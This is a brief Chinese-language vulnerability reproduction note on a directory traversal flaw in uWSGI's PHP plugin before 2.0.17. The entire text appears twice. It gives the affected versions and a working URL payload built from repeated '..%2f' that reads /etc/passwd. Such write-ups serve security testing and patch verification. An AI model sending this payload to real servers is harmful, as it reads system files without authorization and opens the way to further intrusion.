一、漏洞概述
uWSGI 2.0.17之前的PHP插件,没有正确的处理DOCUMENT_ROOT检测,导致用户可以通过..%2f来跨越目录,读取或运行DOCUMENT_ROOT目录以外的文件。
二、影响范围
uWSGI < 2.0.17
三、访问页面
四、漏洞复现
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd
一、漏洞概述
uWSGI 2.0.17之前的PHP插件,没有正确的处理DOCUMENT_ROOT检测,导致用户可以通过..%2f来跨越目录,读取或运行DOCUMENT_ROOT目录以外的文件。
二、影响范围
uWSGI < 2.0.17
三、访问页面
四、漏洞复现
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd